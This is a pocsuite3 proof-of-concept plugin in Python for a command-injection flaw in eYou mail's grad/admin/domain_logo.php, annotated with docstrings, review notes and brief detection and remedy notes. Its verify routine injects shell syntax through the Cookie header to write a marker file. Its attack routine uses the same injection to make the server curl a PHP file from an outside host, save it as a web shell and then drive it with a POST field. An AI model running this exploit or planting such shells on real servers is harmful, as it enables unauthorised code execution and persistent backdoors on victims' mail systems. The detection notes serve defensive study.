"""pocsuite3 plugin for SSV-ID 1240: command execution in eYou mail.

Per the plugin's own ``desc`` field, ``grad/admin/domain_logo.php`` passes the
request cookie into a ``popen`` command without filtering, so shell syntax
placed in the cookie is executed on the server.

Defensive notes:
* The root cause described is request data reaching a shell command; the
  server-side remedy is to stop building the ``popen`` command from cookie
  data, or to validate and escape it strictly.
* Both modes below are recognisable by a request to
  ``/grad/admin/domain_logo.php`` whose Cookie header contains shell
  metacharacters (``||``, ``>``, ``#``), followed by a request for a newly
  created ``.txt`` or ``.php`` file under ``/grad/admin/``.

If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, visit http://pocsuite.org
"""
# NOTE(review): logger, get_listener_ip, get_listener_port, REVERSE_PAYLOAD and
# ReadTimeout are imported but not referenced anywhere in the code shown here.
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str as randoms1
from requests.exceptions import ReadTimeout


class DemoPOC(POCBase):
    """Plugin metadata plus verify/attack routines for the eYou domain_logo.php issue."""

    vulID = '1240'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2013-10-01'
    createDate = '2014-4-8'
    updateDate = '2014-4-8'
    references = ['http://www.wooyun.org/bugs/wooyun-2013-027523']
    # English: "eYou Email /domain_logo.php command execution vulnerability POC"
    name = 'eYou Email /domain_logo.php 命令执行漏洞 POC'
    appPowerLink = 'http://www.eyou.net'
    appName = 'eYou'
    # No affected version range is recorded; '#' is the value the author left here.
    appVersion = '#'
    vulType = 'Command Execution'
    # English: "In grad/admin/domain_logo.php the cookie is taken and passed,
    # unfiltered, into a popen command, which results in command execution;
    # a shell can be obtained."
    desc = '''grad/admin/domain_logo.php 中,取得cookie后未经过滤带入 popen 命令, 造成了命令执行,可以getshell。 '''
    samples = []
    # NOTE(review): a list holding one empty string, not an empty list.
    install_requires = ['']

    def _verify(self):
        """Check whether a command placed in the Cookie header is executed.

        Sends a GET to ``<self.url>/grad/admin/domain_logo.php`` whose Cookie
        value appends an ``echo <marker>`` redirected to ``<prefix>.txt`` after
        ``||``, then requests ``<self.url>/grad/admin/<prefix>.txt`` and looks
        for the marker in the response body.

        Returns:
            The Output built by ``parse_output``: success carrying
            ``VerifyInfo.URL`` when the marker is found, failure otherwise.

        Side effects visible here: two HTTP requests. When the target is
        affected, the marker file stays on the server; nothing in this method
        removes it.
        """
        result = {}
        var_url = '%s/grad/admin/domain_logo.php' % self.url
        # Marker value; presumably a 10-character random string (helper not shown).
        random_str = randoms1(10)
        # The file name is the first five characters of the marker.
        headers = {'Cookie': "cookie=/php/lib/||echo %s>%s.txt#" % (random_str, random_str[:5])}
        # NOTE(review): no timeout= is passed to either request, and no
        # request exception is caught in this method.
        requests.get(var_url,headers=headers)
        url = '%s/grad/admin/%s.txt' % (self.url, random_str[:5])
        resp = requests.get(url).text
        # Only a response that echoes the full marker counts as a positive.
        if random_str in resp:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap a result dict in a pocsuite3 Output.

        A non-empty ``result`` is reported through ``output.success``; an
        empty one is reported as 'target is not vulnerable'.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Use the same Cookie injection to place a PHP file on the target.

        The Cookie value makes the server run ``curl`` against the URL in
        ``shell`` and redirect the output to ``<random_filename>.php``. The
        method then POSTs a ``c`` form field to that file and reports success
        when the reversed file name appears in the response.

        Returns:
            The Output built by ``parse_output``: success carrying
            ``ShellInfo`` when the check passes, failure otherwise.

        Side effects visible here: one GET and one POST. When the target is
        affected, the fetched ``.php`` file stays reachable under
        ``/grad/admin/``; nothing in this method removes it.
        """
        result = {}
        random_filename = randoms1(10)
        var_url = '%s/grad/admin/domain_logo.php' % self.url
        # NOTE(review): the planted content is fetched over plain HTTP from a
        # third-party host and is not part of this file, so what ends up on the
        # target cannot be reviewed from here.
        shell = "http://pocsuite.org/include_files/php_attack.txt"
        headers = {'Cookie': 'cookie=/php/lib/||curl %s>%s.php#' % (shell, random_filename)}
        # NOTE(review): `request` is assigned but never read; no timeout= is passed.
        request = requests.get(var_url, headers=headers)
        shell_url = '%s/grad/admin/%s.php' % (self.url, random_filename)
        # How the planted file interprets the `c` field is not visible in this file.
        param = {'c': 'echo strrev(%s);' % random_filename}
        r = requests.post(shell_url, data=param).text
        if str(random_filename)[::-1] in r:
            # NOTE(review): 'Content' is set to the same URL as 'URL'.
            result['ShellInfo'] = {'URL': shell_url, 'Content': shell_url}
        return self.parse_output(result)


# Module-level side effect: registers the class with pocsuite3 on import.
register_poc(DemoPOC)
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负